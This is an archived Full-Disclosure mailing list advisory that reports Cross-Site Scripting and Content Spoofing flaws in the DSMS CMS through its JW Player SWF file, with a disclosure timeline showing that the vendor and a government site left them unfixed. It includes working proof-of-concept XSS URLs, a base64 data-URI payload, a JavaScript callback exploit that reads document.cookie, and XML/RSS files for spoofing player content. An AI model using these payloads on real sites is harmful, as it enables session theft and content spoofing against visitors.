lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <010601cf2a98$b63bed50$9b7a6fd5@pc>
Date: Sat, 15 Feb 2014 23:55:29 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS and CS vulnerabilities in DSMS

Hello list!

There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. 
This is commercial CMS. It's used particularly at government site 
dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine.

There are also other vulnerabilities in the system, about which I've 
informed developers. None of the vulnerabilities were fixed.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of DSMS.

-------------------------
Affected vendors:
-------------------------

Strebul studio
http://strebul.com

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)

http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Cross-Site Scripting (WASC-08):

If at the site at page with jwplayer.swf (player.swf) there is possibility 
(via HTML Injection) to include JS code with callback-function, and there 
are 19 such functions in total, then it's possible to conduct XSS attack. 
I.e. JS-callbacks can be used for XSS attack.

Example of exploit:

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameters file and 
image, which allows to spoof content of flash - i.e. by setting addresses of 
video (audio) and/or image files from other site.

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

Swf-file of JW Player accepts arbitrary addresses in parameter config, which 
allows to spoof content of flash - i.e. by setting address of config file 
from other site (parameters file and image in xml-file accept arbitrary 
addresses). For loading of config file from other site it needs to have 
crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile, 
which allows to spoof content of flash - i.e. by setting address of playlist 
file from other site (parameters media:content and media:thumbnail in 
xml-file accept arbitrary addresses). For loading of playlist file from 
other site it needs to have crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Example playlist</title>
    <item>
      <title>Video #1</title>
      <description>First video.</description>
      <media:content url="1.flv" duration="5" />
      <media:thumbnail url="1.jpg" />
    </item>
    <item>
      <title>Video #2</title>
      <description>Second video.</description>
      <media:content url="2.flv" duration="5" />
      <media:thumbnail url="2.jpg" />
    </item>
  </channel>
</rss>

------------
Timeline:
------------ 

2013.11.04 - informed administrators of government site. No response, no 
fix.
2013.11.13 - announced at my site.
2013.11.18 - informed developers about vulnerabilities in CMS and at 
dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't 
do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ